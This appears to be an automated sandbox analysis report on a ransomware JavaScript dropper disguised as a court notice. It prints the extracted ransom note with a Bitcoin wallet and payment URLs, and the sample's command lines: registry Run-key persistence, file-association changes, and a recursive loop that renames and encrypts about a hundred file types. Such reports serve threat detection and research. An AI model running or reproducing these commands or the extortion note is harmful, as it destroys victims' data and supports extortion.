Overview

overview

10

Static

static

Notice_to_...doc.js

windows7_x64

10

Notice_to_...doc.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-01-2021 15:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Notice_to_Appear_00614075.doc.js

  • Size

    37KB

  • MD5

    f84c5242741ccd7949762ca5cbb96556

  • SHA1

    894c726e0a3e8cf3fd98690c27f885c4aa775775

  • SHA256

    aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6

  • SHA512

    5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71

Score
10/10
persistenceransomwarespyware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\a.txt

Ransom Note
ATTENTION! All your documents, photos, databases and other important personal files were encrypted using strong RSA-1024 algorithm with a unique key. To restore your files you have to pay 0.47952 BTC (bitcoins). Please follow this manual: 1. Create Bitcoin wallet here: https://blockchain.info/wallet/new 2. Buy 0.47952 BTC with cash, using search here: https://localbitcoins.com/buy_bitcoins 3. Send 0.47952 BTC to this Bitcoin address: 16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB 4. Open one of the following links in your browser to download decryptor: http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB 5. Run decryptor to restore your files. PLEASE REMEMBER: - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES. - Nobody can help you except us. - It`s useless to reinstall Windows, update antivirus software, etc. - Your files can be decrypted only after you make payment. - You can find this manual on your desktop (DECRYPT.txt).
Wallets

16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

URLs

http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Modifies registry class 7 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3828
      • C:\Windows\system32\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        3⤵
        • Adds Run key to start application
        PID:3104
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        3⤵
        • Modifies registry class
        PID:4484
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3944
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        3⤵
        • Modifies registry class
        PID:4512
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
      2⤵
        PID:4300
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
        2⤵
          PID:4060
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" eshcq5kixoxv136vc35cel0lp2it1p3zz4r4)
          2⤵
            PID:3052

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\a.txt
          MD5

          31ff92435ec51fab9b7ba2ed4c15dd3e

          SHA1

          696a564dde590c05ad07c16357304fe1c9b25710

          SHA256

          b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143

          SHA512

          7066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\a0.exe
          MD5

          aa95b86d3ba312056034964adc1e19b2

          SHA1

          4b17b2c278462245e95cafdef16fff76401ba105

          SHA256

          773f80fcae6ac4fe16fb497a23e5596dfcec643ff14967c76366d3b333f3d7b9

          SHA512

          a992837759a461396ba8796ba63229e05b288e115961adec6a0730ee67d5500e923c6f9b6e5835193e09f2f15185185a28c1afd28c48ae6fa326d5bf405104e8

          Download Submit
        • memory/3052-9-0x0000000000000000-mapping.dmp
          Download
        • memory/3104-8-0x0000000000000000-mapping.dmp
          Download
        • memory/3828-3-0x0000000000000000-mapping.dmp
          Download
        • memory/3944-5-0x0000000000000000-mapping.dmp
          Download
        • memory/4020-4-0x0000000000000000-mapping.dmp
          Download
        • memory/4060-7-0x0000000000000000-mapping.dmp
          Download
        • memory/4300-6-0x0000000000000000-mapping.dmp
          Download
        • memory/4484-12-0x0000000000000000-mapping.dmp
          Download
        • memory/4512-10-0x0000000000000000-mapping.dmp
          Download
        • memory/4712-2-0x000001A3A89B0000-0x000001A3A89B4000-memory.dmp
          Filesize

          16KB

          Download